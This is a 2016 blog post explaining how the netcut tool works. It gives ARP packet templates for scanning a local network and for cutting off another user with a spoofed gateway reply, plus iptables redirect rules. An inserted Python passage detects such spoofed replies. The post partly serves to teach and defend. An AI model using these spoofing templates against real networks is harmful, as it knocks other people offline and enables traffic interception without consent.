Saturday, 10 September 2016

How netcut works

Netcut algorithm/workflow - RedFoX
For those who want to know how it works, for those who want to build a netcut tool, and so that you can take precautions if you are hit by a netcut attack :D
If we want to know whether we are being hit by a netcut attack, use arpmon.py (ARP packet monitoring) and check whether there are any suspicious ARP packets. Look at the [TO CUT OTHER USER] section and check whether any ARP packet is suspicious, that is, has the same shape as the one in [TO CUT OTHER USER].
NETCUT Algorithm:
Scan MAC address (arp request) -> add iptables rules -> (send arp reply packet -> repeat)
[TO SCAN MAC ADDRESS]:
ARP PACKET
****************_ETHERNET_FRAME_****************
Dest/Broadcast MAC: ffffffffffff #Router MAC Address/Broadcast MAC Address
Source MAC: 00082252bdff #Your MAC Address
Type: 0806
************************************************
******************_ARP_HEADER_******************
Hardware type: 0001
Protocol type: 0800
Hardware size: 06
Protocol size: 04
Opcode: 0001 #OPCODE to request
Source MAC: 00082252bdff #Your MAC Address
Source IP: 192.168.1.2 #Your IP Address
Dest MAC: 000000000000 #Local MAC Address
Dest IP: 192.168.1.x #IP Address to get MAC Address # x = 0-256
*************************************************
[TO CUT OTHER USER]:
ARP PACKET
****************_ETHERNET_FRAME_****************
Dest/Broadcast MAC: f40e22f67bdd #MAC Address Target
Source MAC: 000822f036b0 #Your MAC Address
Type: 0806
************************************************
******************_ARP_HEADER_******************
Hardware type: 0001
Protocol type: 0800
Hardware size: 06
Protocol size: 04
Opcode: 0002 #OPCODE to reply
Source MAC: 000822f036b0 #Your MAC Address
Source IP: 192.168.1.254 #IP address Router
Dest MAC: ffffffffffff #MAC Address Router/Broadcast MAC Address
Dest IP: 0.0.0.0 #Local IP Address
*************************************************
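The check described above (looking for ARP packets shaped like [TO CUT OTHER USER]) can be automated. The following is an added example, not the code of arpmon.py or of this post's author: it parses raw ARP frames and lists the reasons a reply looks spoofed. GATEWAY_MAC is a constructed placeholder for your router's real MAC, and the function names and sample frames are assumptions built from the field values shown on this page.

```python
import struct

GATEWAY_IP = "192.168.1.254"   # router IP from the dump above
GATEWAY_MAC = "aabbccddeeff"   # constructed placeholder: put your router's real MAC here

def parse_arp(frame):
    """Split an Ethernet frame carrying IPv4-over-Ethernet ARP into its fields."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":   # too short or EtherType not ARP
        return None
    eth_dst, eth_src = frame[0:6], frame[6:12]
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    ip = lambda b: ".".join(str(x) for x in b)
    return {"eth_dst": eth_dst.hex(), "eth_src": eth_src.hex(), "op": op,
            "sha": sha.hex(), "spa": ip(spa), "tha": tha.hex(), "tpa": ip(tpa)}

def suspicious(frame, gateway_ip=GATEWAY_IP, gateway_mac=GATEWAY_MAC):
    """Return the reasons (heuristics) an ARP reply resembles [TO CUT OTHER USER]."""
    a = parse_arp(frame)
    reasons = []
    if a is None or a["op"] != 2:          # only ARP replies are judged here
        return reasons
    if a["spa"] == gateway_ip and a["sha"] != gateway_mac:
        reasons.append("gateway IP claimed by unexpected MAC " + a["sha"])
    if a["eth_src"] != a["sha"]:
        reasons.append("Ethernet source differs from ARP sender MAC")
    if a["tha"] == "ff" * 6 and a["eth_dst"] != "ff" * 6:
        reasons.append("unicast frame with broadcast ARP target MAC")
    if a["tpa"] == "0.0.0.0":
        reasons.append("reply addressed to 0.0.0.0")
    return reasons

def build(eth_dst, eth_src, op, sha, spa, tha, tpa):
    """Assemble a constructed sample frame (bytes only, nothing is sent)."""
    ipb = lambda s: bytes(int(x) for x in s.split("."))
    return (bytes.fromhex(eth_dst) + bytes.fromhex(eth_src) + b"\x08\x06" +
            struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) +
            bytes.fromhex(sha) + ipb(spa) + bytes.fromhex(tha) + ipb(tpa))

# Constructed samples using the field values of the two dumps on this page.
CUT = build("f40e22f67bdd", "000822f036b0", 2, "000822f036b0", "192.168.1.254", "ffffffffffff", "0.0.0.0")
SCAN = build("ffffffffffff", "00082252bdff", 1, "00082252bdff", "192.168.1.2", "000000000000", "192.168.1.7")
# Constructed legitimate reply from the placeholder gateway MAC.
GOOD = build("f40e22f67bdd", GATEWAY_MAC, 2, GATEWAY_MAC, "192.168.1.254", "f40e22f67bdd", "192.168.1.10")

if __name__ == "__main__":
    for name, f in (("cut", CUT), ("scan", SCAN), ("good", GOOD)):
        print(name, suspicious(f) or "ok")
```

Take the known-good gateway MAC from the router itself (label or admin page), not from an ARP cache that may already be poisoned.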
[IPTABLES RULES TO REDIRECT TARGET]:
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
protoent* getprotobynumber(int)(3) is not implemented on Android
DNAT tcp -- anywhere anywhere to:127.0.0.100 #Target destination
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
MASQUERADE all -- anywhere anywhere
Chain natctrl_nat_POSTROUTING (0 references)
target prot opt source destination
Chain oem_nat_pre (0 references)
target prot opt source destination

